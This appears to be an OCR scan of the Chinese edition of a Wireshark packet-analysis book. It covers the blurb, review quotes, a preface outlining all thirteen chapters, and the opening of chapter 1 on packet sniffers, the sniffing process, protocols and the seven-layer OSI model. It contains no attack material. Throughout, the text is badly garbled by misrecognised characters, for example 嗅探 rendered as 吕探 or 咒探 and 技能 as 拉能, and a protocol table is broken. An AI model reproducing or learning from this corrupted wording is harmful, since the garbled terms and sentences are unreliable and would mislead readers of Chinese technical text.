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内 容 近 要 


Wireshatk 是 一 球 流 行 的 网 络 吕 探 软件 ， 本 书 在 上 一 版 的 基础 上 针对 
Wireshark 2.0.5 和 IPv6 进 行 了 更 新 ， 并 通过 大 量 真实 的 案例 对 Wireshark 
的 使 用 进行 了 详细 讲解 ， 和 在 帮助 谈 者 理解 Wireshark 捕 获 的 PCAP 格 式 
的 数据 包 ， 以 便 对 网 络 中 的 问题 进行 排 错 。 


本 书 共 13 章 ， 从 数据 包 分 析 与 数据 包 别 探 磺 的 基础 知识 开始 ， 循 厅 
渐进 地 介绍 Wireshark 的 基本 使 用 方法 及 其 数据 包 分 析 功 能 特性 ， 同 时 还 
介绍 了 针对 不 同 协议 层 与 无 线 网 络 的 具体 实践 技术 与 经 验 技 巧 。 在 此 过 
程 中 ， 作 者 结合 大 量 真 实 的 架 例 ， 图 文 并 成 地 演示 使 用 Wireshark 进 行 数 
据 包 分 析 的 技术 方法 ， 使 读者 能 够 顺 看 本 书 思 路 逐步 掌握 网 络 数 据 包 虽 
探 与 分 析 拉 能。 附录 部 分 列举 了 数据 包 分 析 工 具 ， 以 及 其 他 数据 包 分 析 
的 学 习 资 源 ， 并 对 数据 包 的 表现 形式 展开 讨论 ， 介 绍 如 何 使 用 数据 包 结 
构图 但 看 和 表示 数据 包 。 


本 书 适合 网 络 协议 开发 人 员 、 网 络 管理 与 维护 人 员 、“ 不 怀 好 意 
的 ”的 黑客 、 选 修 网 络 课程 的 高 校 学 生 阅读 。 


对 本 书 的 赞誉 


本 书 内 容 丰 量 ， 设 计 巧 妙 义 通俗 易 懂 。 老 实说 ， 这 本 数据 包 分 析 的 
图 书 让 我 倍 感 兴奋 。 





TechRepublic 


强烈 建议 初级 网 络 分 析 师 、 软 件 开发 人 员 和 刚刚 取得 CSE/CISSP 等 认证 
的 人 员 阅 读本 书 。 读 完 本 书后 ， 你 们 只 需要 知 起 袖子 ， 束 可 以 动手 排除 
网 络 (和 安全 ) 问题 了 。 





Gunter Ollmann, IOActive 前 首席 技术 官 


下 一 次 再 排 合 网 络 变 慢 的 问题 时 ， 我 将 求助 本 书 。 对 任何 技术 图 书 
来 说 ， 这 或 许 是 我 能 给 的 最 好 的 评价 。 





Michael W. Lucas, Absolute Free BSD and Network Flow Analysis 作 
省 


无 论 你 负责 多 大 规模 的 网 络 管理 ， 本 书 都 必 不 可 少 。 





Linux Pro Magazine 
本 书写 作 精 良 、 简 单 易 用 、 格 式 恨 好 ， 相 当 实 用 。 
ArsGeek.com 


RR 那么 本 书 是 一 个 不 错 的 选 








State Of Security 


本 书 内 容 丰 富 ， 紧 扣 “ 实 战 "主题 。 它 向 读者 提供 了 进行 数据 包 分 析 所 需 
的 信息 ， 并 借助 于 真实 的 实例 演示 了 Wirshark 的 用 途 。 


LinuxSecurity.com 





网 络 中 有 未 知 的 主机 之 间 在 互相 通信 吗 ? 我 的 机 需 正 在 与 阳 生 的 主机 
通信 吗 ? 你 只 需要 一 个 数据 包 唱 探 器 束 可 以 找到 这 些 问 题 的 党 案 ， 
Wireshark 是 完成 这 项 工作 的 最 佳 工具 之 一 ， 而 本 书 是 了 解 访 工具 的 最 住 
方法 之 一 。 


Free Software Magazine 





本 书 是 数据 包 分 析 初 学 者 和 进 阶 者 的 理想 之 选 。 


Daemon News 








“天 赐 恩 老 ! 多 么 甜 闫 的 声 首 ! 

这 挽救 了 像 我 这 样 的 可 怜 人 人 ! 
我 曾经 迷失 过 ， 但 是 现在 我 找到 了 方 同 ; 
我 曾经 盲目 过 ， 但 是 现在 我 看 到 了 光明 。” 
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下 人 一“ 
日 吾 


本 书 从 2015 年 底 开 始 编号， 在 2017 年 早期 完成 ， 总 计 历 时 一 年 半 。 
而 在 本 书 出 版 之 日 ， 距 离 本 书 第 2 版 发 布 的 时 间 已 经 有 6 年 ， 距 离 第 1 版 
则 长 达 10 年 之 久 。 本 书 对 内 容 进 行 了 大 量 的 更 新 ， 有 具有 全 新 的 网 络 捕获 
文件 和 场景 ， 并 新 添 了 一 章 内 容 来 讲解 如 何 使 用 TShark 和 Tcpdump 通 过 
命令 行进 行 数据 包 分 析 。 如 果 你 喜欢 前 两 个 版 本 ， 那 么 相信 你 也 会 喜欢 
这 本 书 。 它 延续 了 之 前 的 写作 风格 ， 以 一 种 人 简单 易 惜 的 方式 来 分 析 解 
释 。 如 果 你 因为 缺少 关于 网 络 或 Wireshark 更 新 的 最 新 信息 而 不 愿意 尝试 
之 前 的 两 个 版 本 ， 那 么 你 可 以 阅读 本 书 ， 因 为 这 里 包含 了 新 的 网 络 协议 
扩展 内 容 和 关于 Wireshark 2.x 的 更 新 信息 。 


为 什么 购 关 本 书 


你 一 定 很 想 知 道 为 什么 应 该 买 这 本 书 ， 而 不 是 关于 数据 包 分 
他 书籍 。 答 案 在 于 本 书 的 书 名 : 《Wireshark 数 据 包 分 析 实 战 》。 让 我 们 
面 对 这 样 的 现实 没有 比 实 际 经 验 更 加 重要 的 了 。 你 可 以 通过 真实 场 
景 中 的 实际 双 例 来 掌握 书 中 的 内 容 。 


析 的 其 





本 书 的 前 半 部 分 介绍 了 理解 数据 包 分 析 和 Wireshark 所 需 的 知识 ， 而 
后 半 部 分 则 将 重心 放 在 了 实践 案例 上 ， 你 在 日 章 的 网 络 管理 中 经 党 会 遇 
到 这 些 案 例 中 出 现 的 情况 。 


无 论 你 是 网 络 技 术 人 员 、 网 络 管理 员 、 首 席 信息 官 、 上 和 面 工 程 师 ， 
还 是 网 络 安全 分 析 师 ， 在 理解 并 使 用 本 书 中 讲解 的 数据 包 分 析 拉 术 时 ， 
部 会 让 你 受 雁 罪 浅 。 


慨 念 与 方法 


我 是 一 个 非常 随意 的 人 ， 上 所 以 ， 当 我 教授 你 一 个 概念 时 ， 我 也 会 符 


试用 非常 随 间 的 方式 来 进行 解释 。 而 本 书 的 语言 也 会 同样 随意 ， 里 然 星 
座 的 技术 术语 很 容易 让 人 迷失 ， 但 我 已 经 尽 我 所 能 地 你 持 行 文 的 一 狼 与 
消 晰 ， 让 所 有 有 的 定义 更 加 明确 、 直 白 ， 没 有 任何 紧 文 手 节 。 然 而 我 终 宛 
是 从 伟大 的 肯 培 基 州 来 的 ， 所 以 我 不 得 不 收 起 我 们 的 一 些 傣 张 语气 ,但 
如 果 你 在 本 书 中 看 到 一 些 粗野 的 乡村 土话 ， 请 务必 原 度 我 。 


如 条 你 趴 的 想 学 习 并 精通 数据 包 分 析 拉 术 ， 你 应 该 首 移 午 握 本 书 前 


儿 半 中 介绍 的 概念 ， 因 为 它们 是 理解 本 书 其 余部 分 的 前 提 。 本 书 的 后 半 
部 分 将 是 纯粹 的 实战 内 容 ， 或 许 你 在 工作 中 并 不 会 遇 到 完全 相同 的 场 


有 三 
民 ， 


但 在 学 习 本 书后 你 应 该 可 以 应 用 所 学 到 的 概念 与 技术 ， 来 解决 你 所 


直到 的 实际 问题 。 


接 下 来 让 我 们 快速 浏览 本 书 各 划 的 主要 内 容 。 


第 1 章 “ 数 据 包 分 析 与 网 络 基础 ?>。 什 么 是 数据 包 分 析 技 术 ? 这 种 技 
术 的 基本 原理 是 什么 样 的 ? 你 访 如 何 使 用 这 项 技术 ? 本 章 将 讲解 这 
些 网 络 通 信和 与 数据 包 分 析 的 基础 知识 。 

第 2 章 “ 监 听 网 络 线路 ”。 本 章 将 介绍 在 网 络 中 放置 数据 包 唱 探 需 时 
可 以 使 用 的 各 种 不 同 技术 。 

第 3 章 “Wireshark 入 门 ?”。 从 本 章 起 ， 我 们 将 开始 进入 Wireshark 软 件 
的 世界 ， 介 绍 Wireshark 软 件 的 入 门 知 识 从 哪里 下 载 ， 如 何 使 用 
它 ， 它 完成 什么 功能 ， 为 什么 它 受 到 如 此 多 的 好 评 与 天 注 ， 以 及 其 
他 使 用 技巧 。 本 草包 侣 了 有 关 使 用 配置 文件 目 定 义 Wireshark 的 讨 
Eo 

第 4 草 “ 玩 转 捕获 数据 包 ”。 在 你 运行 Wireshark 软 件 之 后 ， 你 需要 知 
道 如 何 与 捕获 的 数据 包 进 行 交 互 ， 而 这 是 你 开始 学 习 基 础 实践 方法 
的 起 始点 ， 包 括 天 于 数据 包 流 和 名称 解析 更 详细 的 全 新 内 容 。 

第 5 半 “Wireshatk 局 级 特性 ”。 一 旦 掌握 了 Wireshark 基 础 知识 ， 束 可 
以 准备 学 习 它 的 融 级 和 尾 性 了 。 本 章 将 深入 钻研 Wireshark 的 局 级 特 
性 ， 这 你 揭 开 Wireshark 的 神秘 面纱 ， 来 了 解 一 些 比较 少见 的 操作 。 
本 章 包 括 关 于 数据 包 沪 和 名 称 解 析 更 详细 的 全 新 内 容 。 





第 6 章 “ 用 命令 行 分 析 数 据 包 ”。Wireshark 功 能 强大 ， 但 有 时 你 需要 
离开 图 形 界 面 ， 与 命令 行 上 的 数据 包 进 行 交 互 。 本 章 同 你 介绍 了 使 
用 TShark 和 Tcpdump 这 两 种 命令 行 包 分 析 工 其 的 方法 。 

第 7 划 “ 网 络 层 协 议 "。 本 半 通 过 解析 ARP、IPvV4、IPV6 和 ICMP， 来 
向 你 介绍 数据 包 级 别 上 常见 的 网 络 层 通 信 。 要 在 现实 场景 中 对 这 些 
协议 进行 故障 排除 ， 首 先 需 要 了 解 它们 的 工作 原理 。 

第 8 章 “ 传 输 层 协议 "。 本 章 讨论 了 两 种 常见 的 传输 协议 TCP 和 和 
UDP。 大 多 数 数 据 包 都 将 使 用 这 两 种 协议 中 的 一 种 ， 因 此 了 解 它们 
在 数据 包 级 别 的 外 观 以 及 它们 之 间 的 差异 非常 重要 。 

第 9 草 “ 币 见 高 层 网 络 协议 ”。 本 章 继续 讲解 网 络 协议 的 相关 内 容 ， 
将 从 数据 包 的 层次 上 带 你 了 解 4 种 篆 见 的 高 层 网 络 通信 协议 一 一 
HTTP、DNS、DHCP 与 SMTP。 

第 10 章 “基础 的 现实 世界 场景 >。 本 章 将 包含 一 些 和 常见 的 网 络 流量 ， 
以 及 最 初 的 现实 场景 中 的 案例 。 每 个 案例 都 将 以 一 种 易于 遵循 的 格 
式 呈 现 ， 包 括 问 题 、 分 析 和 解 诀 方法。 这 些 基 础 场景 案例 仅仅 涉及 
少量 儿 台 计算 机 ， 以 及 有 限 的 分 析 一 足以 让 你 找到 感觉， 并 将 其 
运用 到 实践 中 。 

第 11 草 “让 网 络 不 再 卡 ”。 网 络 技术 人 员 通 到 的 最 普 壳 的 网 络 问题 之 
人 本 章 便 是 专门 为 解决 这 一 问题 而 设 
ti HY。o 

第 12 章 “安全 领域 的 数据 包 分 析 ”。 网 络 安全 是 信息 技术 领域 中 最 大 
的 热点 话题 之 一 ， 本 章 将 回 你 展示 使 用 数据 包 分 析 技 术 解 决 安全 相 
天 问题 的 实际 有 宁 例 。 

第 13 章 “无 线 网 络 数据 包 分 析 ”。 本 章 是 无 线 网 络 数 据 包 分 析 技 术 启 
蒙 ， 讨 论 了 无 线 数据 包 分 析 与 有 线 数 据 包 分 析 技 术 的 差异 ， 并 包含 
了 一 些 无 线 网 络 流量 分 析 的 案例 。 

附录 A“ 延 伸 阅 读 ”"。 本 书 附 录 A 给 出 了 其 他 一 些 参考 工具 和 网 站 列 
表 ， 你 可 能 会 发 现 这 些 工具 和 网 站 在 你 使 用 前 面 介 绍 的 数据 包 分 析 
技术 时 非常 有 用 。 

附录 B“ 分 析 数 据 包 结构 ”。 如 果 你 想 深 入 研究 解释 单个 数据 包 ， 那 
么 可 以 参考 附录 B 的 内 容 ， 它 概述 了 数据 包 信 息 如 何以 二 进 制 形式 
存储 以 及 如 何 将 二 进 制 转换 为 十 六 进 制 表示 法 。 然 后 ， 它 将 同 你 展 
示 如 何 使 用 数据 包 结 构图 解析 以 十 六 进 制 表 示 法 呈现 的 数据 包 。 在 
你 需要 花费 大 量 时 间 分 析 目 定义 协议 或 使 用 命令 行 分析 工 具 的 情况 
下 ， 这 会 很 方便 。 


如 何 使 用 本 书 


我 期 竺 本 书 按照 如 下 两 种 方式 进行 使 用 。 


。 作为 一 本 教学 书籍 ， 你 可 以 逐 章 阅读， 特别 注意 后 面 的 章节 中 涉及 
的 实际 场景 ， 它 们 可 以 帮助 你 进一步 理解 和 和 测 握 数据 包 分 析 拉 术 。 

。 作为 一 本 参考 资料 ， 有 些 Wireshark 软 件 的 特性 是 你 不 会 经 常 使 用 
的 ， 所 以 你 可 能 会 态 记 它们 是 如 何 工 作 的 。 当 你 需要 快速 重 温 如 何 
使 用 Wireshark 软 件 的 某 个 特性 时 ， 可 以 从 本 书 中 获得 参考 。 当 你 进 
行 数 据 包 分 析 时 ， 可 能 会 需要 参考 本 书 提供 的 这 些 图 表 和 方法 。 


关于 示例 捕获 文件 


本 书 使 用 的 所 有 捕获 文件 部 可 以 在 弄 步 社区 下 载 ， 为 了 将 本 书 的 价 
I 强烈 建议 下 载 这 些 文件 ， 并 在 学 习 每 个 上 实 采 例 时 使 用 它 
门 。 


EVN DES Si a 


在 这 里 ， 我 必须 介绍 一 下 由 本 书 而 久生 出 的 美好 事物 。 在 本 书 第 1 
版 出 版 后 不 入， 我 创办 了 一 个 501(c)(3) 的 非 营 利 性 组 织 一 一 乡村 科技 基 


金 会 (Rural Technology Fund) 。 


比 起 城市 与 市 郊 的 学 生 们 ， 乡 村 的 学 生 即 使 拥有 很 优秀 的 成 绩 ， 仍 
然 很 少 有 机 会 能 够 接触 到 最 新 的 科技 。 创 办 于 2008 年 的 乡村 科技 基金 会 
(RTF) 是 我 的 终极 理想 。RTEF 致 力 于 能 够 减少 乡村 学 生 与 城市 同龄 学 
生 们 之 间 的 数字 鸿沟 ， 为 此 它 有 人 针对 性 地 发 起 了 奖学金 项 目 、 社 区 参与 
计划 、 教 育 技 术 资 源 捐赠 ， 以 及 一 些 在 乡村 和 贫困 地 区 的 科技 推广 和 宣 
传 项 目 。 


2016 年 ，RTF 为 美国 乡村 和 贫困 地 区 的 1 万 多 名 学 生 提 供 了 技术 教 
育 资源 。 我 很 高 兴 地 宣布 ， 本 书 作 者 的 所 有 收入 都 直接 交 给 RTF 来 文 持 
这 些 日 标 。 如 果 你 想 了 解 更 多 关于 农村 科技 基金 的 信息 或 者 想 知 道 能 大 
它 做 些 什 么 ， 请 访问 我 们 的 网 站 或 者 天 注 我 们 的 Twitter 
(DORuralIechFund 。 








在 计算 机 网 络 中 ， 每 天 部 可 能 友和 生成 干 上 万 、 各 式 各 样 的 问题 ， 从 
简 里 的 间 诬 软件 感染 ， 到 复杂 的 路 由 右 配 置 错 误 ， 不 一 而 定 。 我 们 永远 
也 不 可 能 立即 解决 所 有 问题 ， 而 只 能 期 盼 序 分 地 准备 好 相关 的 知识 和 工 
有 具 ， 从 而 能 够 快速 地 啊 应 各 种 闫 型 的 错误 。 


为 了 真正 地 理解 网 络 问 题 ， 我 们 需要 进入 数据 包 导 次。 所 有 的 网 络 
问题 都 源 于 数据 包 导 次， 即使 是 最 读 涡 的 应 用 程序 ， 它 们 也 可 能 是 “ 金 
玉 其 外 ”但 “ 败 称 其 中 ?， 有 着 混 乱 的 设计 与 糟 糙 的 实现 ， 叉 或 是 看 起 来 
征 可 信 的 ， 但 衣 地 里 在 摘 些 悉 意 的 行为 。 现 在 ， 没 有 任何 东西 能 够 逃 出 
我 们 的 视线 范围 一 一 这 里 不 再 有 那些 令 人 误解 的 沫 单 栏 、 用 来 吸引 眼球 
的 动画 ， 以 及 无 法 让 人 信赖 的 员工 。 在 数据 包 层 次 上 ， 就 不 再 有 真正 的 
秘密 《加 密 通 信 除 外 ) ， 在 数据 包 层 次 上 做 得 越 多 ， 那 我 们 殉 能 够 对 网 
PR 


本 书 将 市 痢 你 一 起 进入 神奇 的 网 络 数据 包 世 界 ， 你 将 学 到 如 何 解决 
网 络 通 信和 超 慢 的 问题 ， 识 列 出 应 用 程序 的 性 能 短 贷 ， 甚 至 在 真实 世界 的 
场景 中 退 躁 黑客 。 当 读 完 这 本 书后 ， 你 应 该 能 够 应 用 先进 的 数据 包 分 析 
拉 术 ， 来 帮助 解决 目 己 网 络 中 的 实际 问题 ， 即 便 它 们 看 起 来 是 那么 的 复 


隶 与 本 了 手 。 


在 这 一 草 中 ， 我 们 将 开始 学 习 一 些 网 络 通信 方面 的 基础 知识 ， 这 样 
你 可 以 获得 疯 谈 和 学 习 后 续 章 丰 所 需 的 基础 知识 衣 景 。 


1.1 数据 包 分 析 与 数据 包 嗅 探 郁 


数据 包 分 析 ， 退 第 也 被 称 为 数据 包 咒 探 或 协议 分 析 ， 指 的 古 捕 著 和 
解析 网 络 上 在 线 传输 数据 的 过 程 ， 通 第 是 为 了 能 更 好 地 了 解 在 网 络 上 正 
在 及 生 的 事情 。 数 据 包 分 析 过 程 通 利 由 数据 包 咖 探 鼠 来 执行 ， 而 数据 包 
中 探 表 则 是 一 种 用 来 在 网 络 尹 介 上 捕获 原始 传输 数据 的 工具 。 


数据 包 分 析 拉 术 可 以 用 来 达到 如 下 目标 。 


了 解 网 络 特征 。 

但 看 网 络 上 的 通信 主体 。 

全 认 谁 或 是 哪些 应 用 在 占用 网 络 市 宽 。 
识别 网 络 便 用 融 峰 时 间 。 

识别 可 能 的 攻击 或 恶意 活动 。 

寻找 不 安全 以 及 小 用 网 络 资源 的 应 用 。 


目前 市 面 上 有 痢 多 种 类 型 的 数据 包 哩 探 妖 ， 包 括 免 费 的 和 商业 的 。 
每 个 软件 的 设计 目标 都 会 存在 一 些 大 异 。 尝 行 的 数据 包 分 析 软 件 包括 
Tcpdump、OmniPeek 和 Wireshark〔( 我 们 在 这 本 书 中 只 使 用 此 率 软 
件 ) 。Tcpdump 古 一 个 命令 行程 序 ， 而 Wireshark 和 和 OmniPeekd 都 拥有 图 
形 用 户 界 面 (GUI) 。 


1.1.1 评 信 数据 包 咒 探 磊 


当 你 选择 一 丈 数 据 包 品 探 费 时 ， 和 需要 考虑 的 因 系 很 多 ， 包 括 以 下 几 
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支持 的 协议 : 数据 包 嗅 探 器 对 协议 解析 的 支持 范围 是 各 不 相同 的 ， 
大 部 分 通常 都 能 解析 常见 的 网 络 协议 〈 如 IPv4 和 ICMP ) 、 传 输 层 协议 
(如 TCP 和 UDP) ， 甚 至 一 些 应 用 层 协 议 〈 如 DNS 和 HITP) 。 然 而 ， 
它们 可 能 并 不 支持 一 些 非 传统 的 或 新 的 协议 (如 IPv6、SMBv2、SIP 
等 ) 。 在 选择 一 蒜 嗅 探 器 时 ， 需 要 确保 它 能 够 支持 你 所 要 用 到 的 协议 。 


用 尸 友好 性 车 碟 数 据 包 嗅 探 夫 的 界面 布局 、 安 闻 的 容易 度 ， 以 及 
操作 流程 鸭 通 用 性 。 你 选择 的 虽 探 右 应 该 适合 你 的 专业 知识 水 平 。 如 本 


你 的 数据 包 分 析 经 验 还 很 少 的 话 ， 可 能 需要 避免 选 挤 那 些 更 遍 级 命令 行 
虽 探 井 ， 比如 Tcpdump; je 如 果 你 拥有 丰 遇 的 经 验 ， 你 可 能 会 
觉得 这 类 命令 行程 序 更 具有 吸引 力 。 在 逐步 积累 数据 包 分 析 经 验 时 ， 你 
其 至 会 友 现 组 合 使 用 多 种 数据 包 唱 探 右 软件 将 更 有 助 于 适应 不 同 的 应 用 


场景 。 


必用 : 数据 包 咖 探 融 最 突出 的 优点 是 有 痢 很 多 能 够 与 任何 商业 产品 
相 妮 美的 免费 工具 。 商 业 产 品 与 其 他 蔡 代 品 之 间 的 一 个 明显 的 区 列 是 它 
们 的 报 香 引 擎 ， 商 业 产 品 通 利 包 括 各 种 形 却 的 化 哨 的 报 生生 成 模块 ， 而 
在 免费 软件 中 则 通常 蛤 乏 。 


技术 支持 : 即使 你 已 经 掌握 了 唱 探 软件 的 基本 用 法 ， 但 在 遇 到 一 些 
新 间 题 时 仍 需 要 撤 术 文 持 。 在 评估 技术 文 持 时 ， 你 可 以 寻找 开 及 人员 文 
档 、 公 众 论 坛 和 邮件 列表 。 虽 然 对 于 一 些 像 Wireshark 这 样 的 免费 软件 可 
能 缺乏 一 些 开 及 人 员 文 档 ， 但 使 用 这 些 应 用 软件 的 社区 往往 可 以 项 补 这 
些 空 日 。 使 用 者 和 页 献 者 社区 会 提供 一 些 讨 论 区 、 维 基 、 博 客 ， 来 帮助 
你 获得 更 多 关于 数据 包 别 探 霹 的 使 用 方法 。 


操作 系统 文 标 : 不 辛 的 是 ， 并 不 是 全 部 数据 包 咒 探 右 部 文 持 所 有 的 
操作 系统 平台 。 你 圾 要 选择 一 球 咒 探 如 ， 能 够 文 持 所 有 你 将 要 工作 的 操 
作 系 统 。 如 果 你 是 一 位 顾问 ， 有 时 要 在 大 多 数 操作 系统 平台 上 进行 数据 
包 捕 获 和 分 析 ， 那 么 你 就 需要 一 球 能 够 在 大 多 数 操作 系统 平台 上 运行 的 
吗 探 融 。 你 还 需要 留意 ， 有 时 你 会 在 一 台 机 达 上 捕获 数据 包 ， 然 后 在 力 
一 台 机 右上 分 析 它 们 。 操 作 系 统 之 间 的 产 异 ， 可 能 会 迫使 你 在 不同 的 设 
备 上 使 用 不 同 的 咒 探 间 软 件 。 


1.1.2 ”数据 包 咒 探 帮 工作 过 程 


数据 包 嗅 探 过 程 中 涉及 软件 和 便 件 乙 同 的 协作 。 这 个 过 程 可 以 分 为 


成 3 个 步骤 。 


第 一 步 : 收集 ， 数 据 包 咒 探 右 从 网 络 线 统 上 收集 原始 二 进 制 数据 。 
通 昭 情况 下 ， 退 过 将 选 定 的 网 卡 设 置 成 混杂 模式 来 完成 抓 包 。 在 这 种 模 
人 
数据 包 。 


第 二 步 : 转换 ， 将 捕获 的 三 进 制 数据 转换 成 可 读 形 式 。 融 级 的 命令 
行 数据 包 嗅 探 器 就 文 持 到 这 一 步骤 。 到 这 一 步 ， 网 络 上 的 数据 包 将 以 一 
种 非常 基础 的 解析 方式 进行 显示 ， 而 将 大 部 分 的 分 析 工 作 留 给 最 终 用 
厂 。 


第 三 步 〈 最 后 一 步 ) : 分 析 ， 对 捕获 和 转换 后 的 数据 进行 真正 的 深 
入 分 机 。 数 据 包 嘿 探 右 以 捕获 的 网 络 数据 作为 输入 ， 识 别 并 验证 它们 的 
协议 ， 然 后 开始 分 析 每 个 协议 的 特定 属性 。 


1.2 ”网络 通信 穆 理 


为 了 充分 理解 数据 包 分 析 技 术 ， 你 必须 准确 掌握 计算 机 是 如 何 通 过 
网 络 进 行 相互 通信 的 。 在 本 市 中 ， 我 们 将 研究 网 络 协 议 、 开 放 系 统 互 连 
模型 (OSI 模型 )、 网 络 数据 帧 的 基础 知识 ， 以 及 支持 网 络 通信 的 人 硬件 
知识 。 


1.2.1 协议 


现代 网 络 是 由 多 种 运行 在 不 同 平台 上 的 异 构 系统 所 组 成 的 。 为 了 玫 
助 它们 之 间 相 互通 信 ， 我 们 使 用 了 一 做 共同 的 网 络 语 言 ， 并 称 之 为 协 
议 。 篆 见 的 网 络 协议 包括 传输 控制 协议 CTCP) 、 互 联网 协议 (CIP) 、 
地 址 解析 协议 (ARP) 和 动态 主机 配置 协议 CDHCP) 。 协 议 栈 是 由 一 
组 协同 工作 网 络 协 议 的 逻辑 组 合 而 成 的 。 


理解 网 络 协议 的 最 佳 途 径 乙 一 是 将 它们 想象 成 人 类 口 头 或 书面 语言 
的 使 用 规则 。 每 一 种 语言 都 有 规则 ， 如 动词 应 该 如 何 结合 、 人 们 该 如 何 
问候 ， 甚 至 该 如 何 礼 貌 地 致谢 。 网 络 协议 大 多 也 是 以 同样 方式 进行 工作 
的 ， 帮 助 我 们 定义 如 何 路 由 数据 包 、 如 何 发 起 一 个 连接 ， 以 及 如 何 确认 
收 到 的 数据 。 一 个 网 络 协议 可 能 非常 人 简单， 也 可 能 非常 复 森 ， 这 取决 于 
它 的 功能 。 昌 然 各 种 协议 往往 有 着 巨大 的 差异 ， 但 它们 通 篆 用 来 解决 以 


下 问题 。 


发 起 连接 : 是 由 客户 闫 还 是 服务 器 发 起 连接 ? 在 真正 通信 之 前 必须 
要 交换 哪些 信息 ? 





协商 连接 参数 : 通信 和 需要 进行 协议 加 密 吗 ?加 密 密 钥 如 何在 通信 双 
方 进行 传输 ? 

数据 格式 通信 数据 在 数据 包 中 如 何 排 列 ? 数据 在 接收 设备 时 以 什 
么 样 的 顺序 进行 处 理 ? 


错误 检测 与 校正 : 当 数 据 包 化 费 过 长 的 时 间 才 到 这 目的 地 时 该 如 何 
处 理 ? 当 各 户 闪 暂时 无 法 和 服务 右 建 并 通信 时 ， 访 如 何 恢 复 连 接 ? 


连接 终止: 一 全 主机 如 何 告 各 男 一 全 主机 通 甬 信和 已经 结束 ? 为 了 礼貌 
地 终止 通信 ， 应 该 传送 什么 样 的 最 终 信 息 
1.2.2 ”七 层 OSI 参 考 模 型 


网 络 协议 是 基于 它们 在 行业 标准 OSI 参考 模型 中 的 职能 进行 分 层 
的 。OSI 模 型 将 网 络 通 信 过 程 分 为 七 个 不 同 层 次 ， 如 图 1-1 所 示 。 这 个 分 
层 模 型 使 得 我 们 更 容易 理解 网 络 通信 。 


一 





图 1-1 OSI 参考 模型 的 七 层 协议 视图 


靖 的 应 用 层 表 示 用 来 访问 网 络 资源 的 实际 程序 。 撒 层 则 是 物理 
后 ， 通过 它 来 进行 实际 的 网 络 数据 传播 。 每 一 层次 上 的 网 络 苏 议 共 同 合 
作 ， 来 确 你 通信 数据 在 协议 上 层 或 下 层 中 得 到 受 善 处 理 。 


WE 


OSI 参 考 模型 最 初 在 1983 年 由 国际 标准 化 组 织 出 版 ， 标 准 号 为 ISO 7498。OSI 参 考 模型 只 
是 一 个 行业 建议 标准 ， 协 议 开 发 时 并 不 需要 严格 地 遵守 它 。OSI 参 考 模 型 也 并 不 是 现 有 唯一 





的 网 络 模型 ， 人 例如， 有些 人 更 推 录 美国 国防 部 (DoD) 的 网 络 模型 ， 也 被 称 为 TCP / IP 模 





OSI 参考 模 开 中 的 每 层 都 共有 特定 功能 ， 有 其 体 如 下 。 


应 用 层 (Application layer, 第 7 层 ) : OSI 参考 模型 的 最 上 层 ， 为 用 
己 访 问 网 络 催 源 所 癸 一 种 手段 。 这 通 利 十 唯一 一 层 能 够 由 最 终 用 户 看 到 
的 协议 ， 因 为 它 提 供 的 接口 ， 是 了 最终 用 户 所 有 网 络 活动 的 基础 。 


表示 层 〈Presentation layer, 第 6 层 ) : 这 一 层 将 接收 到 的 数据 转换 
成 应 用 层 可 以 读 取 的 格式 。 在 叶 示 层 守 成 的 数据 编码 与 解码 取决 于 发 送 
i 用 层 协 议 。 表 示 层 同时 进行 用 来 保护 数据 的 加 密 与 解密 


会 话 层 (Session layer, 第 5 层 ) : 这 一 层 官 理 两 台 计算 机 之 间 的 对 
话 (会 会 课 》， 供 责 丰 所 兴 闻 们 设备 之 间 奸 立 管理 和 终 上 上 全 话 连接 。 会 
话 层 还 负责 以 全 双 工 或 者 半 双 工 的 方式 来 创建 会 话 连 接 ， 在 通信 主机 间 
关闭 连接 ， 而 不 是 粗暴 地 直接 丢弃 。 


传输 层 (Transport layer, 第 4 层 ) : 传输 层 的 主要 目的 是 为 较 低 层 
提供 可 菲 的 数据 传输 服务 。 通 过 流量 控制 、 分 段 /重组 、 甘 错 控 制 等 机 
制 ]， 传输 层 确保 网 络 数 据 出 到 并 的 无 大 错 传输 。 因 为 要 确保 可 菲 的 数据 
传输 其 过 程 极 为 烦琐 ， 上 所 以 OSI 参考 模型 将 其 作为 完整 的 一 层 。 传 征 层 
同时 提供 了 面向 连接 和 无 连接 的 网 络 协议 。 茶 些 防 火场 和 代理 服务 磺 也 
在 这 一 层 工作 。 


网 络 技 (Network layer, 第 3 层 ) : 这 一 层 负 贡 数 据 在 物理 网 络 中 
的 路 由 转 友 ， 是 最 复 洒 的 OSI 层 之 一 。 它 除了 及 下 网 络 主机 的 逻辑 寻 址 
(例如 通过 一 个 卫 地 址 ) ， 还 处 理 数 据 包 分 片 和 一 些 情况 下 的 错误 检 


调 。 路 由 各 在 这 一 层 上 工作 ，。 


数据 链 路 层 (Data link layer, 第 2 层 ) : 这 一 层 捉 供 了 通过 物理 网 
络 传输 数据 的 方法 ， 其 主要 目的 是 提供 一 个 寻 扯 方案 ， 可 用 于 确定 物理 
人 


物理 层 (Physical layer, 第 1 层 ) : OSI 参考 模型 的 底层 是 传输 网 络 
数据 的 物理 媒介 。 这 一 层 定 义 了 所 有 使 用 的 网 络 便 件 设备 的 物理 和 电气 
特性 ， 包 括 电 压 、 和 集线器 、 网 络 适配器 、 中 继 器 和 线 绕 规范 等 。 


物理 层 建立 和 终止 连接 ， 并 提供 一 种 共享 通信 资源 的 方法 ， 将 数字 
守 号 转换 成 模拟 信号 传输 ， 并 反 过 来 将 接收 模拟 信号 转换 回 数字 信号 。 





一 个 把 OSI 模型 各 个 层次 都 记 住 的 口诀 是 Please Do Not Throw Sausage Pizza Away。 从 第 
一 层 开始 ， 每 个 单词 的 站 字母 依次 代表 看 OSI 模 型 中 的 每 一 层 。 








表 1-1 列 出 了 了 OSI 参考 模型 各 个 层次 上 的 一 些 常见 网 络 协 议 。 


表 1-1 OSI 参 考 模型 各 个 层次 上 的 典型 网 络 协 议 


HITP、 SMTP、 FIP、 Telnet 


人 os SAP、SDP、NWlink 
传输 层 TCP、UDP、SPX 





人 人 Token Ring、FDDI、AppleTalk 


尽管 OSI 参考 模型 仅仅 是 一 个 建议 标准 ， 你 还 是 应 该 将 其 牢记 在 
心 。 阅 读 这 本 书 时 ， 你 会 发 现 ， 对 不 同 层 网 络 协议 进行 交互 才能 解决 你 
所 面 对 的 网 络 问题 。 比 如 遇 到 路 由 器 问题 ， 你 应 该 快速 确认 这 是 “第 3 层 
上 的 问题 >， 而 应 用 软件 问题 则 被 识别 为 “第 7 层 上 的 问题 "。 


